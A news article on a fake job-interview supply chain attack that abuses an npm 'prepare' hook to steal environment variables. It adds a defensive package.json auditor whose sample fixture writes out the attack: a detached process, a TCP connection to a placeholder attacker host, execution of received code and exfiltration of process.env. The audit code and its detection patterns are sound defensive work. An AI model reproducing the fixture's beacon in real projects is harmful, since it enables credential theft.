A sophisticated supply chain attack targeting developers via fake Web3 job interviews has been uncovered, according to a technical analysis by security researcher reymom.xyz.
The attack begins with social engineering: purported recruiters on platforms such as LinkedIn or Telegram contact developers with plausible employment offers. After an initial interview, candidates are asked to clone and run a 'take-home' repository, often during a live screen-sharing session.
According to the report, the malicious repository, which impersonated the legitimate 0G Labs project under the name 'MGVerse,' used an npm 'prepare' lifecycle hook, which npm runs automatically during 'npm install', to execute a hidden payload. When the developer ran 'npm install,' the process silently spawned a background Node process designed to exfiltrate sensitive data.
"The social pressure of a live interview is the critical vector. You don't have time to audit the repo. You're sharing your screen. You want to impress so you run npm install," the source stated.
Technical execution and data theft
The attack chain involves three distinct stages. The first stage uses a Vercel-hosted loader (ipcheck-six.vercel.app) to initiate the process. The second stage establishes a custom TCP beacon on port 1224, connected to an attacker-controlled server located in Texas.
Once the connection is established, the third stage gives the operator a remote code execution (RCE) primitive: code received over the beacon is run through JavaScript's 'new Function' constructor, so arbitrary code can be executed on the victim's machine. The primary goal of the exfiltration is to steal the victim's 'process.env' data (the environment variables of the running process), which can include API keys, SSH keys, browser cookies, and cryptocurrency wallet seeds.
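The two technical points above, a lifecycle hook that fires on 'npm install' and a script that spawns a detached process, opens a raw TCP socket, executes received data with 'new Function' and serialises 'process.env', can both be checked for before anyone runs an install. The following is an added, defender-side example written for this article; it is not code from the report, from 0G Labs or from the 'MGVerse' repository. It audits a parsed package.json for install-time hooks and scans the script each hook invokes for those constructs. The package names, the 'scripts/setup.js' path and the file contents are constructed sample data, and the host name is a labelled placeholder.

```javascript
// Added defensive example (not the report's code). Audits a repository's
// package.json for npm lifecycle hooks that run automatically during
// `npm install`, then scans the script each hook invokes for the constructs
// the report describes: a detached background Node process, a raw TCP beacon,
// `new Function` execution of received data, and serialising process.env.
// Every sample value below is constructed for the demonstration.

// Lifecycle scripts npm runs on a plain `npm install` inside a cloned repo.
const INSTALL_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'preprepare', 'prepare', 'postprepare',
  'prepublish', // legacy hook: also runs on a local `npm install`
];

// Constructs that are rarely legitimate in an install-time script.
const RISKY_PATTERNS = [
  { name: 'dynamic code execution', re: /\bnew\s+Function\s*\(|\beval\s*\(/ },
  { name: 'detached background process', re: /\bspawn\s*\([\s\S]*?detached\s*:\s*true|\.unref\s*\(\)/ },
  { name: 'raw TCP connection', re: /\bnet\.(connect|createConnection)\s*\(|\bnew\s+net\.Socket\b/ },
  { name: 'environment serialisation', re: /JSON\.stringify\s*\(\s*process\.env\s*\)/ },
  { name: 'base64-decoded payload', re: /Buffer\.from\s*\([^)]*,\s*['"]base64['"]\s*\)/ },
];

// Install-time hooks declared in a parsed package.json object.
function findInstallHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Names of the risky patterns present in a script's source text.
function scanScriptSource(source) {
  return RISKY_PATTERNS.filter((p) => p.re.test(source)).map((p) => p.name);
}

// `files` maps repo-relative paths to file contents. A real tool would back
// this with fs.readFileSync; an in-memory map keeps the example offline.
// Verdict: 'clean' (no hooks), 'review' (hooks, nothing flagged) or 'block'.
function auditPackage(pkg, files) {
  const findings = findInstallHooks(pkg).map(({ hook, command }) => {
    // Only `node <file>` commands are resolved to a source file; anything
    // else (shell pipelines, curl, npx) is left for manual review.
    const m = command.match(/(?:^|\s)node\s+(\S+)/);
    const source = m && files[m[1]] ? files[m[1]] : '';
    return { hook, command, issues: scanScriptSource(source) };
  });
  let verdict = 'clean';
  if (findings.length > 0) {
    verdict = findings.some((f) => f.issues.length > 0) ? 'block' : 'review';
  }
  return { verdict, findings };
}

// --- constructed sample inputs (not the real repository's contents) ---
const SUSPICIOUS_PKG = {
  name: 'take-home-sample', // constructed name
  scripts: { build: 'tsc', prepare: 'node scripts/setup.js' },
};
const SUSPICIOUS_FILES = {
  'scripts/setup.js': [
    "const net = require('net');",
    "const { spawn } = require('child_process');",
    '// pattern sample only: detached child that outlives `npm install`',
    "spawn(process.execPath, ['-e', STAGE2], { detached: true, stdio: 'ignore' }).unref();",
    "const sock = net.connect(1224, 'ATTACKER_HOST_PLACEHOLDER');",
    "sock.on('data', (d) => new Function(d.toString())());",
    'sock.write(JSON.stringify(process.env));',
  ].join('\n'),
};
const CLEAN_PKG = { name: 'clean-app', scripts: { build: 'tsc', test: 'jest' } };

console.log(JSON.stringify(auditPackage(SUSPICIOUS_PKG, SUSPICIOUS_FILES), null, 2));
console.log('clean-app verdict:', auditPackage(CLEAN_PKG, {}).verdict);
```

The audit is a pre-install gate, not a substitute for the simplest mitigation: running 'npm install --ignore-scripts' (or setting 'npm config set ignore-scripts true') stops every lifecycle hook from executing, so a 'prepare' script never gets the chance to spawn anything, and a 'review' verdict is the cue to read the hook's command before re-enabling scripts.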
The researcher, who was personally targeted by the campaign, detected the background process approximately 44 minutes after running the malicious command. The analysis confirmed that the attack was designed to bypass traditional detection by appearing as a standard part of the software installation lifecycle.
Researchers have identified the campaign tag as 'tid=Y3Jhc2ggdGhlIGJhZCBndXlz' and noted that the infrastructure remains active. The repository used in the attack has been archived for further forensic investigation.